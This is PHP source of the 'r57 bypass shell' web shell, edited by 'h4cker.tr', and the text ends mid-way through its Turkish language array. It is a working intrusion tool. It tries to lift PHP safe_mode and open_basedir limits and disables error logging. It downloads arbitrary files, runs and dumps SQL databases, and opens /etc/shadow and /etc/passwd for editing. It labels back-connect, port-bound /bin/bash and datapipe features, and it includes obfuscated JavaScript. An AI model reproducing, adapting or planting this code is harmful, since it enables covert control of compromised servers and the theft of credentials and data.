

<?php error_reporting(0);
$language = 'tr';
$auth = 0;
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);;
echo '';
if ((!@function_exists('ini_get')) || (@ini_get('open_basedir') != NULL) || (@ini_get('safe_mode_include_dir') != NULL)) {
    $open_basedir = 1;
} else {
    $open_basedir = 0;
};
define("starttime", @getmicrotime());
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
$safe_mode = @ini_get('safe_mode');
$version = '1.43<br>&nbsp;&nbsp;&nbsp;edited by h4cker.tr';
if (@version_compare(@phpversion(), '4.1.0') == - 1) {
    $_POST = & $HTTP_POST_VARS;
    $_GET = & $HTTP_GET_VARS;
    $_SERVER = & $HTTP_SERVER_VARS;
    $_COOKIE = & $HTTP_COOKIE_VARS;
}
if (@get_magic_quotes_gpc()) {
    foreach ($_POST as $k => $v) {
        $_POST[$k] = stripslashes($v);
    }
    foreach ($_COOKIE as $k => $v) {
        $_COOKIE[$k] = stripslashes($v);
    }
}
if ($auth == 1) {
    if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER']) !== $name || md5($_SERVER['PHP_AUTH_PW']) !== $pass) {
        header('WWW-Authenticate: Basic realm="HELLO!"');
        header('HTTP/1.0 401 Unauthorized');
        exit("<b>Access Denied</b>");
    }
}
$head = '
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<title>r57 bypass shell | modified by h4cker.tr</title>
<script type="text/javascript" language="javascript">
<!--
ML="P<>phTsmtr/9:Cuk RIc=jSw.o";
MI="1F=AB05@FA=D4883<::GGGHC;;343HCI7:8>9?HE621:F=AB052";
OT="";
for(j=0;j<MI.length;j++){
OT+=ML.charAt(MI.charCodeAt(j)-48);
}document.write(OT);
// --></script>
<STYLE>

tr {

BORDER-RIGHT:  black 1px solid;

BORDER-TOP:    black 1px solid;

BORDER-LEFT:   black 1px solid;

BORDER-BOTTOM: black 1px solid;

BORDER-COLOR: black;

color: silver;

}

td {

BORDER-RIGHT:  black 1px solid;

BORDER-TOP:    black 1px solid;

BORDER-LEFT:   black 1px solid;

BORDER-BOTTOM: black 1px solid;

BORDER-COLOR: black;

background-color:black;

color: white;

}



.table1 {

BORDER: 0px;

BORDER-COLOR: #333333;

BACKGROUND-COLOR: black;

color: white;

}

.td1 {

BORDER: 0px;

BORDER-COLOR: #333333;

font: 7pt Verdana;

BACKGROUND-COLOR: black;

color: green;

}

.tr1 {

BORDER: 0px;

BORDER-COLOR: #333333;

color: #50AA20;

}

table {

BORDER:  #eeeeee 1px outset;

BORDER-COLOR: #333333;

BACKGROUND-COLOR: #131313;

color: #50AA20;

}

input {

border			: solid 1px;

border-color		: #2D2D2D #252525 #252525 #252525;

BACKGROUND-COLOR: black;

font: 8pt Verdana;

color: red;

}

select {

BORDER-RIGHT:  #ffffff 1px solid;

BORDER-TOP:    #999999 1px solid;

BORDER-LEFT:   #999999 1px solid;

BORDER-BOTTOM: #ffffff 1px solid;

BORDER-COLOR: #333333;

BACKGROUND-COLOR: #131313;

font: 8pt Verdana;

color: white;;

}

submit {

BORDER:  buttonhighlight 2px outset;

BACKGROUND-COLOR: #131313;

width: 30%;

color: white;

}

textarea {

BORDER-RIGHT:  #ffffff 1px solid;

BORDER-TOP:    #999999 1px solid;

BORDER-LEFT:   #999999 1px solid;

BORDER-BOTTOM: #ffffff 1px solid;

BORDER-COLOR: #333333;

BACKGROUND-COLOR: black;

font: Fixedsys bold;

color: silver;

}

BODY {

SCROLLBAR-ARROW-COLOR: #444444;

SCROLLBAR-BASE-COLOR: #444444;

margin: 1px;

color: #50AA20;

background-color: #131313;

}

.main {

margin			: -287px 0px 0px -490px;

border			: #000000 solid 1px;

BORDER-COLOR: #333333;

}

.tt {

background-color: black;

}

A:link {COLOR:red; TEXT-DECORATION: none}

A:visited { COLOR:red; TEXT-DECORATION: none}

A:active {COLOR:red; TEXT-DECORATION: none}

A:hover {color:blue;TEXT-DECORATION: none}

</STYLE>

<script language=\'javascript\'>
function hide_div(id)
{
  document.getElementById(id).style.display = \'none\';
  document.cookie=id+\'=0;\';
}
function show_div(id)
{
  document.getElementById(id).style.display = \'block\';
  document.cookie=id+\'=1;\';
}
function change_divst(id)
{
  if (document.getElementById(id).style.display == \'none\')
    show_div(id);
  else
    hide_div(id);
}


</script>';
class zipfile {
    var $datasec = array();
    var $ctrl_dir = array();
    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
    var $old_offset = 0;
    function unix2DosTime($unixtime = 0) {
        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
        if ($timearray['year'] < 1980) {
            $timearray['year'] = 1980;
            $timearray['mon'] = 1;
            $timearray['mday'] = 1;
            $timearray['hours'] = 0;
            $timearray['minutes'] = 0;
            $timearray['seconds'] = 0;
        }
        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
    }
    function addFile($data, $name, $time = 0) {
        $name = str_replace('\\', '/', $name);
        $dtime = dechex($this->unix2DosTime($time));
        $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
        eval('$hexdtime = "' . $hexdtime . '";');
        $fr = "\x50\x4b\x03\x04";
        $fr.= "\x14\x00";
        $fr.= "\x00\x00";
        $fr.= "\x08\x00";
        $fr.= $hexdtime;
        $unc_len = strlen($data);
        $crc = crc32($data);
        $zdata = gzcompress($data);
        $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
        $c_len = strlen($zdata);
        $fr.= pack('V', $crc);
        $fr.= pack('V', $c_len);
        $fr.= pack('V', $unc_len);
        $fr.= pack('v', strlen($name));
        $fr.= pack('v', 0);
        $fr.= $name;
        $fr.= $zdata;
        $this->datasec[] = $fr;
        $cdrec = "\x50\x4b\x01\x02";
        $cdrec.= "\x00\x00";
        $cdrec.= "\x14\x00";
        $cdrec.= "\x00\x00";
        $cdrec.= "\x08\x00";
        $cdrec.= $hexdtime;
        $cdrec.= pack('V', $crc);
        $cdrec.= pack('V', $c_len);
        $cdrec.= pack('V', $unc_len);
        $cdrec.= pack('v', strlen($name));
        $cdrec.= pack('v', 0);
        $cdrec.= pack('v', 0);
        $cdrec.= pack('v', 0);
        $cdrec.= pack('v', 0);
        $cdrec.= pack('V', 32);
        $cdrec.= pack('V', $this->old_offset);
        $this->old_offset+= strlen($fr);
        $cdrec.= $name;
        $this->ctrl_dir[] = $cdrec;
    }
    function file() {
        $data = implode('', $this->datasec);
        $ctrldir = implode('', $this->ctrl_dir);
        return $data . $ctrldir . $this->eof_ctrl_dir . pack('v', sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
    }
}
function compress(&$filename, &$filedump, $compress) {
    global $content_encoding;
    global $mime_type;
    if ($compress == 'bzip' && @function_exists('bzcompress')) {
        $filename.= '.bz2';
        $mime_type = 'application/x-bzip2';
        $filedump = bzcompress($filedump);
    } else if ($compress == 'gzip' && @function_exists('gzencode')) {
        $filename.= '.gz';
        $content_encoding = 'x-gzip';
        $mime_type = 'application/x-gzip';
        $filedump = gzencode($filedump);
    } else if ($compress == 'zip' && @function_exists('gzcompress')) {
        $filename.= '.zip';
        $mime_type = 'application/zip';
        $zipfile = new zipfile();
        $zipfile->addFile($filedump, substr($filename, 0, -4));
        $filedump = $zipfile->file();
    } else {
        $mime_type = 'application/octet-stream';
    }
}
function moreread($temp) {
    global $lang, $language;
    $str = '';
    if (@function_exists('fopen') && @function_exists('feof') && @function_exists('fgets') && @function_exists('fclose')) {
        $ffile = @fopen($temp, "r");
        while (!@feof($ffile)) {
            $str.= @fgets($ffile);
        }
        fclose($ffile);
    } elseif (@function_exists('fopen') && @function_exists('fread') && @function_exists('fclose') && @function_exists('filesize')) {
        $ffile = @fopen($temp, "r");
        $str = @fread($ffile, @filesize($temp));
        @fclose($ffile);
    } elseif (@function_exists('file')) {
        $ffiles = @file($temp);
        foreach ($ffiles as $ffile) {
            $str.= $ffile;
        }
    } elseif (@function_exists('file_get_contents')) {
        $str = @file_get_contents($temp);
    } elseif (@function_exists('readfile')) {
        $str = @readfile($temp);
    } else {
        echo $lang[$language . '_text56'];
    }
    return $str;
}
function readzlib($filename, $temp = '') {
    global $lang, $language;
    $str = '';
    if (!$temp) {
        $temp = tempnam(@getcwd(), "copytemp");
    };
    if (@copy("compress.zlib://" . $filename, $temp)) {
        $str = moreread($temp);
    } else echo $lang[$language . '_text119'];
    @unlink($temp);
    return $str;
}
function mailattach($to, $from, $subj, $attach) {
    $headers = "From: $from\r\n";
    $headers.= "MIME-Version: 1.0\r\n";
    $headers.= "Content-Type: " . $attach['type'];
    $headers.= "; name=\"" . $attach['name'] . "\"\r\n";
    $headers.= "Content-Transfer-Encoding: base64\r\n\r\n";
    $headers.= chunk_split(base64_encode($attach['content'])) . "\r\n";
    if (mail($to, $subj, "", $headers)) {
        return 1;
    }
    return 0;
}
class my_sql {
    var $host = 'localhost';
    var $port = '';
    var $user = '';
    var $pass = '';
    var $base = '';
    var $db = '';
    var $connection;
    var $res;
    var $error;
    var $rows;
    var $columns;
    var $num_rows;
    var $num_fields;
    var $dump;
    function connect() {
        switch ($this->db) {
            case 'MySQL':
                if (empty($this->port)) {
                    $this->port = '3306';
                }
                if (!@function_exists('mysql_connect')) return 0;
                $this->connection = @mysql_connect($this->host . ':' . $this->port, $this->user, $this->pass);
                if (is_resource($this->connection)) return 1;
                break;
            case 'MSSQL':
                if (empty($this->port)) {
                    $this->port = '1433';
                }
                if (!@function_exists('mssql_connect')) return 0;
                $this->connection = @mssql_connect($this->host . ',' . $this->port, $this->user, $this->pass);
                if ($this->connection) return 1;
                break;
            case 'PostgreSQL':
                if (empty($this->port)) {
                    $this->port = '5432';
                }
                $str = "host='" . $this->host . "' port='" . $this->port . "' user='" . $this->user . "' password='" . $this->pass . "' dbname='" . $this->base . "'";
                if (!@function_exists('pg_connect')) return 0;
                $this->connection = @pg_connect($str);
                if (is_resource($this->connection)) return 1;
                break;
            case 'Oracle':
                if (!@function_exists('ocilogon')) return 0;
                $this->connection = @ocilogon($this->user, $this->pass, $this->base);
                if (is_resource($this->connection)) return 1;
                break;
            }
            return 0;
        }
        function select_db() {
            switch ($this->db) {
                case 'MySQL':
                    if (@mysql_select_db($this->base, $this->connection)) return 1;
                    break;
                case 'MSSQL':
                    if (@mssql_select_db($this->base, $this->connection)) return 1;
                    break;
                case 'PostgreSQL':
                    return 1;
                    break;
                case 'Oracle':
                    return 1;
                    break;
                }
                return 0;
            }
            function query($query) {
                $this->res = $this->error = '';
                switch ($this->db) {
                    case 'MySQL':
                        if (false === ($this->res = @mysql_query('/*' . chr(0) . '*/' . $query, $this->connection))) {
                            $this->error = @mysql_error($this->connection);
                            return 0;
                        } else if (is_resource($this->res)) {
                            return 1;
                        }
                        return 2;
                        break;
                    case 'MSSQL':
                        if (false === ($this->res = @mssql_query($query, $this->connection))) {
                            $this->error = 'Query error';
                            return 0;
                        } else if (@mssql_num_rows($this->res) > 0) {
                            return 1;
                        }
                        return 2;
                        break;
                    case 'PostgreSQL':
                        if (false === ($this->res = @pg_query($this->connection, $query))) {
                            $this->error = @pg_last_error($this->connection);
                            return 0;
                        } else if (@pg_num_rows($this->res) > 0) {
                            return 1;
                        }
                        return 2;
                        break;
                    case 'Oracle':
                        if (false === ($this->res = @ociparse($this->connection, $query))) {
                            $this->error = 'Query parse error';
                        } else {
                            if (@ociexecute($this->res)) {
                                if (@ocirowcount($this->res) != 0) return 2;
                                return 1;
                            }
                            $error = @ocierror();
                            $this->error = $error['message'];
                        }
                        break;
                    }
                    return 0;
                }
                function get_result() {
                    $this->rows = array();
                    $this->columns = array();
                    $this->num_rows = $this->num_fields = 0;
                    switch ($this->db) {
                        case 'MySQL':
                            $this->num_rows = @mysql_num_rows($this->res);
                            $this->num_fields = @mysql_num_fields($this->res);
                            while (false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
                            @mysql_free_result($this->res);
                            if ($this->num_rows) {
                                $this->columns = @array_keys($this->rows[0]);
                                return 1;
                            }
                            break;
                        case 'MSSQL':
                            $this->num_rows = @mssql_num_rows($this->res);
                            $this->num_fields = @mssql_num_fields($this->res);
                            while (false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
                            @mssql_free_result($this->res);
                            if ($this->num_rows) {
                                $this->columns = @array_keys($this->rows[0]);
                                return 1;
                            };
                            break;
                        case 'PostgreSQL':
                            $this->num_rows = @pg_num_rows($this->res);
                            $this->num_fields = @pg_num_fields($this->res);
                            while (false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
                            @pg_free_result($this->res);
                            if ($this->num_rows) {
                                $this->columns = @array_keys($this->rows[0]);
                                return 1;
                            }
                            break;
                        case 'Oracle':
                            $this->num_fields = @ocinumcols($this->res);
                            while (false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
                            @ocifreestatement($this->res);
                            if ($this->num_rows) {
                                $this->columns = @array_keys($this->rows[0]);
                                return 1;
                            }
                            break;
                        }
                        return 0;
                    }
                    function dump($table) {
                        if (empty($table)) return 0;
                        $this->dump = array();
                        $this->dump[0] = '##';
                        $this->dump[1] = '## --------------------------------------- ';
                        $this->dump[2] = '##  Created: ' . date("d/m/Y H:i:s");
                        $this->dump[3] = '## Database: ' . $this->base;
                        $this->dump[4] = '##    Table: ' . $table;
                        $this->dump[5] = '## --------------------------------------- ';
                        switch ($this->db) {
                            case 'MySQL':
                                $this->dump[0] = '## MySQL dump';
                                if ($this->query('/*' . chr(0) . '*/ SHOW CREATE TABLE `' . $table . '`') != 1) return 0;
                                if (!$this->get_result()) return 0;
                                $this->dump[] = $this->rows[0]['Create Table'];
                                $this->dump[] = '## --------------------------------------- ';
                                if ($this->query('/*' . chr(0) . '*/ SELECT * FROM `' . $table . '`') != 1) return 0;
                                if (!$this->get_result()) return 0;
                                for ($i = 0;$i < $this->num_rows;$i++) {
                                    foreach ($this->rows[$i] as $k => $v) {
                                        $this->rows[$i][$k] = @mysql_real_escape_string($v);
                                    }
                                    $this->dump[] = 'INSERT INTO `' . $table . '` (`' . @implode("`, `", $this->columns) . '`) VALUES (\'' . @implode("', '", $this->rows[$i]) . '\');';
                                }
                                break;
                            case 'MSSQL':
                                $this->dump[0] = '## MSSQL dump';
                                if ($this->query('SELECT * FROM ' . $table) != 1) return 0;
                                if (!$this->get_result()) return 0;
                                for ($i = 0;$i < $this->num_rows;$i++) {
                                    foreach ($this->rows[$i] as $k => $v) {
                                        $this->rows[$i][$k] = @addslashes($v);
                                    }
                                    $this->dump[] = 'INSERT INTO ' . $table . ' (' . @implode(", ", $this->columns) . ') VALUES (\'' . @implode("', '", $this->rows[$i]) . '\');';
                                }
                                break;
                            case 'PostgreSQL':
                                $this->dump[0] = '## PostgreSQL dump';
                                if ($this->query('SELECT * FROM ' . $table) != 1) return 0;
                                if (!$this->get_result()) return 0;
                                for ($i = 0;$i < $this->num_rows;$i++) {
                                    foreach ($this->rows[$i] as $k => $v) {
                                        $this->rows[$i][$k] = @addslashes($v);
                                    }
                                    $this->dump[] = 'INSERT INTO ' . $table . ' (' . @implode(", ", $this->columns) . ') VALUES (\'' . @implode("', '", $this->rows[$i]) . '\');';
                                }
                                break;
                            case 'Oracle':
                                $this->dump[0] = '## ORACLE dump';
                                $this->dump[] = '## under construction';
                                break;
                            default:
                                return 0;
                                break;
                            }
                            return 1;
                        }
                        function close() {
                            switch ($this->db) {
                                case 'MySQL':
                                    @mysql_close($this->connection);
                                break;
                                case 'MSSQL':
                                    @mssql_close($this->connection);
                                break;
                                case 'PostgreSQL':
                                    @pg_close($this->connection);
                                break;
                                case 'Oracle':
                                    @oci_close($this->connection);
                                break;
                            }
                        }
                        function affected_rows() {
                            switch ($this->db) {
                                case 'MySQL':
                                    return @mysql_affected_rows($this->res);
                                break;
                                case 'MSSQL':
                                    return @mssql_affected_rows($this->res);
                                break;
                                case 'PostgreSQL':
                                    return @pg_affected_rows($this->res);
                                break;
                                case 'Oracle':
                                    return @ocirowcount($this->res);
                                break;
                                default:
                                    return 0;
                                break;
                            }
                        }
                    }
                    if (!empty($_POST['cmd']) && $_POST['cmd'] == "download_file" && !empty($_POST['d_name'])) {
                        if ($file = @fopen($_POST['d_name'], "r")) {
                            $filedump = @fread($file, @filesize($_POST['d_name']));
                            @fclose($file);
                        } else if ($file = readzlib($_POST['d_name'])) {
                            $filedump = $file;
                        } else {
                            err(1, $_POST['d_name']);
                            $_POST['cmd'] = "";
                        }
                        if (isset($_POST['cmd'])) {
                            @ob_clean();
                            $filename = @basename($_POST['d_name']);
                            $content_encoding = $mime_type = '';
                            compress($filename, $filedump, $_POST['compress']);
                            if (!empty($content_encoding)) {
                                header('Content-Encoding: ' . $content_encoding);
                            }
                            header("Content-type: " . $mime_type);
                            header("Content-disposition: attachment; filename=\"" . $filename . "\";");
                            echo $filedump;
                            exit();
                        }
                    }
                    if (isset($_GET['phpinfo'])) {
                        echo @phpinfo();
                        echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=" . $_SERVER['PHP_SELF'] . ">BACK</a> ]</b></font></div>";
                        die();
                    }
                    if (!empty($_POST['cmd']) && $_POST['cmd'] == "db_query") {
                        echo $head;
                        $sql = new my_sql();
                        $sql->db = $_POST['db'];
                        $sql->host = $_POST['db_server'];
                        $sql->port = $_POST['db_port'];
                        $sql->user = $_POST['mysql_l'];
                        $sql->pass = $_POST['mysql_p'];
                        $sql->base = $_POST['mysql_db'];
                        $querys = @explode(';', $_POST['db_query']);
                        echo '<body bgcolor=#000000>';
                        if (!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
                        else {
                            if (!empty($sql->base) && !$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
                            else {
                                foreach ($querys as $num => $query) {
                                    if (strlen($query) > 5) {
                                        echo "<font face=Verdana size=-2 color=green><b>Query#" . $num . " : " . htmlspecialchars($query, ENT_QUOTES) . "</b></font><br>";
                                        switch ($sql->query($query)) {
                                            case '0':
                                                echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>" . $sql->error . "</b></font></td></tr></table>";
                                            break;
                                            case '1':
                                                if ($sql->get_result()) {
                                                    echo "<table width=100%>";
                                                    foreach ($sql->columns as $k => $v) $sql->columns[$k] = htmlspecialchars($v, ENT_QUOTES);
                                                    $keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;", $sql->columns);
                                                    echo "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;" . $keys . "&nbsp;</b></font></td></tr>";
                                                    for ($i = 0;$i < $sql->num_rows;$i++) {
                                                        foreach ($sql->rows[$i] as $k => $v) $sql->rows[$i][$k] = htmlspecialchars($v, ENT_QUOTES);
                                                        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;", $sql->rows[$i]);
                                                        echo '<tr><td><font face=Verdana size=-2>&nbsp;' . $values . '&nbsp;</font></td></tr>';
                                                    }
                                                    echo "</table>";
                                                }
                                                break;
                                            case '2':
                                                $ar = $sql->affected_rows() ? ($sql->affected_rows()) : ('0');
                                                echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>" . $ar . "</b></font></td></tr></table><br>";
                                                break;
                                            }
                                        }
                                }
                            }
                        }
                        echo "<br><form name=form method=POST>";
                        echo in('hidden', 'db', 0, $_POST['db']);
                        echo in('hidden', 'db_server', 0, $_POST['db_server']);
                        echo in('hidden', 'db_port', 0, $_POST['db_port']);
                        echo in('hidden', 'mysql_l', 0, $_POST['mysql_l']);
                        echo in('hidden', 'mysql_p', 0, $_POST['mysql_p']);
                        echo in('hidden', 'mysql_db', 0, $_POST['mysql_db']);
                        echo in('hidden', 'cmd', 0, 'db_query');
                        echo "<div align=center>";
                        echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"" . $sql->base . "\"></font><br>";
                        echo "<textarea cols=65 rows=10 name=db_query>" . (!empty($_POST['db_query']) ? ($_POST['db_query']) : ("SHOW DATABASES;\nSELECT * FROM user;")) . "</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
                        echo "</form>";
                        echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=" . $_SERVER['PHP_SELF'] . ">BACK</a> ]</b></font></div>";
                        die();
                    }
                    if (isset($_GET['delete'])) {
                        @unlink('index.php');
                    }
                    if (isset($_GET['tmp'])) {
                        @unlink("/tmp/bdpl");
                        @unlink("/tmp/back");
                        @unlink("/tmp/bd");
                        @unlink("/tmp/bd.c");
                        @unlink("/tmp/dp");
                        @unlink("/tmp/dpc");
                        @unlink("/tmp/dpc.c");
                        @unlink("/tmp/prxpl");
                        @unlink("/tmp/grep.txt");
                    }
                    if (isset($_GET['phpini'])) {
                        echo $head;
                        function U_value($value) {
                            if ($value == '') return '<i>no value</i>';
                            if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
                            if ($value === null) return 'NULL';
                            if (@is_object($value)) $value = (array)$value;
                            if (@is_array($value)) {
                                @ob_start();
                                print_r($value);
                                $value = @ob_get_contents();
                                @ob_end_clean();
                            }
                            return U_wordwrap((string)$value);
                        }
                        function U_wordwrap($str) {
                            $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
                            return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
                        }
                        if (@function_exists('ini_get_all')) {
                            $r = '';
                            echo '<table width=100%>', '<tr><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
                            foreach (@ini_get_all() as $key => $value) {
                                $r.= '<tr><td>' . ws(3) . '<font face=Verdana size=-2><b>' . $key . '</b></font></td><td><font face=Verdana size=-2><div align=center><b>' . U_value($value['local_value']) . '</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>' . U_value($value['global_value']) . '</b></div></font></td></tr>';
                            }
                            echo $r;
                            echo '</table>';
                        }
                        echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=" . $_SERVER['PHP_SELF'] . ">BACK</a> ]</b></font></div>";
                        die();
                    }
                    if (isset($_GET['cpu'])) {
                        echo $head;
                        echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
                        $cpuf = @file("cpuinfo");
                        if ($cpuf) {
                            $c = @sizeof($cpuf);
                            for ($i = 0;$i < $c;$i++) {
                                $info = @explode(":", $cpuf[$i]);
                                if ($info[1] == "") {
                                    $info[1] = "---";
                                }
                                $r.= '<tr><td>' . ws(3) . '<font face=Verdana size=-2><b>' . trim($info[0]) . '</b></font></td><td><font face=Verdana size=-2><div align=center><b>' . trim($info[1]) . '</b></div></font></td></tr>';
                            }
                            echo $r;
                        } else {
                            echo '<tr><td>' . ws(3) . '<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
                        }
                        echo '</table>';
                        echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=" . $_SERVER['PHP_SELF'] . ">BACK</a> ]</b></font></div>";
                        die();
                    }
                    if (isset($_GET['mem'])) {
                        echo $head;
                        echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
                        $memf = @file("meminfo");
                        if ($memf) {
                            $c = sizeof($memf);
                            for ($i = 0;$i < $c;$i++) {
                                $info = explode(":", $memf[$i]);
                                if ($info[1] == "") {
                                    $info[1] = "---";
                                }
                                $r.= '<tr><td>' . ws(3) . '<font face=Verdana size=-2><b>' . trim($info[0]) . '</b></font></td><td><font face=Verdana size=-2><div align=center><b>' . trim($info[1]) . '</b></div></font></td></tr>';
                            }
                            echo $r;
                        } else {
                            echo '<tr><td>' . ws(3) . '<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
                        }
                        echo '</table>';
                        echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=" . $_SERVER['PHP_SELF'] . ">green</a> ]</b></font></div>";
                        die();
                    }
                    if (isset($_GET['dmesg(8)'])) {
                        $_POST['cmd'] = 'dmesg(8)';
                    }
                    if (isset($_GET['free'])) {
                        $_POST['cmd'] = 'free';
                    }
                    if (isset($_GET['vmstat'])) {
                        $_POST['cmd'] = 'vmstat';
                    }
                    if (isset($_GET['lspci'])) {
                        $_POST['cmd'] = 'lspci';
                    }
                    if (isset($_GET['lsdev'])) {
                        $_POST['cmd'] = 'lsdev';
                    }
                    if (isset($_GET['procinfo'])) {
                        $_POST['cmd'] = 'cat /proc/cpuinfo';
                    }
                    if (isset($_GET['version'])) {
                        $_POST['cmd'] = 'cat /proc/version';
                    }
                    if (isset($_GET['interrupts'])) {
                        $_POST['cmd'] = 'cat /proc/interrupts';
                    }
                    if (isset($_GET['realise1'])) {
                        $_POST['cmd'] = 'cat /etc/*realise';
                    }
                    if (isset($_GET['service'])) {
                        $_POST['cmd'] = 'service --status-all';
                    }
                    if (isset($_GET['ifconfig'])) {
                        $_POST['cmd'] = 'ifconfig';
                    }
                    if (isset($_GET['w'])) {
                        $_POST['cmd'] = 'w';
                    }
                    if (isset($_GET['who'])) {
                        $_POST['cmd'] = 'who';
                    }
                    if (isset($_GET['uptime'])) {
                        $_POST['cmd'] = 'uptime';
                    }
                    if (isset($_GET['last'])) {
                        $_POST['cmd'] = 'last -n 10';
                    }
                    if (isset($_GET['psaux'])) {
                        $_POST['cmd'] = 'ps -aux';
                    }
                    if (isset($_GET['netstat'])) {
                        $_POST['cmd'] = 'netstat -a';
                    }
                    if (isset($_GET['lsattr'])) {
                        $_POST['cmd'] = 'lsattr -va';
                    }
                    if (isset($_GET['syslog'])) {
                        $_POST['cmd'] = 'edit_file';
                        $_POST['e_name'] = '/etc/syslog.conf';
                    }
                    if (isset($_GET['fstab'])) {
                        $_POST['cmd'] = 'edit_file';
                        $_POST['e_name'] = '/etc/fstab';
                    }
                    if (isset($_GET['fdisk'])) {
                        $_POST['cmd'] = 'fdisk -l';
                    }
                    if (isset($_GET['df'])) {
                        $_POST['cmd'] = 'df -h';
                    }
                    if (isset($_GET['realise2'])) {
                        $_POST['cmd'] = 'edit_file';
                        $_POST['e_name'] = '/etc/issue.net';
                    }
                    if (isset($_GET['hosts'])) {
                        $_POST['cmd'] = 'edit_file';
                        $_POST['e_name'] = '/etc/hosts';
                    }
                    if (isset($_GET['resolv'])) {
                        $_POST['cmd'] = 'edit_file';
                        $_POST['e_name'] = '/etc/resolv.conf';
                    }
                    if (isset($_GET['systeminfo'])) {
                        $_POST['cmd'] = 'systeminfo';
                    }
                    if (isset($_GET['shadow'])) {
                        $_POST['cmd'] = 'edit_file';
                        $_POST['e_name'] = '/etc/shadow';
                    }
                    if (isset($_GET['passwd'])) {
                        $_POST['cmd'] = 'edit_file';
                        $_POST['e_name'] = '/etc/passwd';
                    }
                    $lang = array('tr_text1' => 'Komut Uygula', 'tr_text2' => 'Server uzerinde komut calistir ', 'tr_text3' => 'Komut istemi ', 'tr_text4' => 'Calisma Dizini ', 'tr_text5' => 'Servere Dosya Upload Et', 'tr_text6' => 'Yerel Dosya ', 'tr_text7' => 'Dizin Veya Dosya Bul ', 'tr_text8' => 'Sec', 'tr_butt1' => 'Uygula', 'tr_butt2' => 'Yukle', 'tr_text9' => 'Porta baglan /bin/bash', 'tr_text10' => 'Port', 'tr_text11' => 'Sifre Giris', 'tr_butt3' => 'Baglan', 'tr_text12' => 'Back-Connect', 'tr_text13' => 'IP', 'tr_text14' => 'Port', 'tr_butt4' => 'Baglan', 'tr_text15' => 'Uzaktan servere dosya yukle', 'tr_text16' => 'ile', 'tr_text17' => 'Uzak Dosya', 'tr_text18' => 'Yerel Dosya', 'tr_text19' => 'Exploits', 'tr_text20' => 'Kullan', 'tr_text21' => '&nbsp;Yeni ad', 'tr_text22' => 'datapipe', 'tr_text23' => 'Yerel Port', 'tr_text24' => 'Uzak Host', 'tr_text25' => 'Uzak Port', 'tr_text26' => 'Kullan', 'tr_butt5' => 'Iste', 'tr_text28' => 'Guvenlik Modunda Calis', 'tr_text29' => 'Giris Yok ', 'tr_butt6' => 'Degistir', 'tr_text30' => 'Cat file', 'tr_butt7' => 'Goster', 'tr_text31' => 'Dosya Bulunamadi', 'tr_text32' => 'PHP Kod Degerlendir ', 'tr_text33' => 'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', 'tr_butt8' => 'Testet', 'tr_text34' => 'Includes fonksiyonu ile Guvenlik modunu atlamayi test et.', 'tr_text35' => 'Mysql da ki yukleme dosyasi ile Guvenlik modunu atlamayi test et.', 'tr_text36' => 'Database[VeriTabani]', 'tr_text37' => 'Kullanici', 'tr_text38' => 'Sifre', 'tr_text39' => 'Tablo', 'tr_text40' => 'Dump database table[DB Tablosu dok]', 'tr_butt9' => 'Dump', 'tr_text41' => 'DB dosyalarini kaydet.[Dump filed]', 'tr_text42' => 'Dosya Duzenle 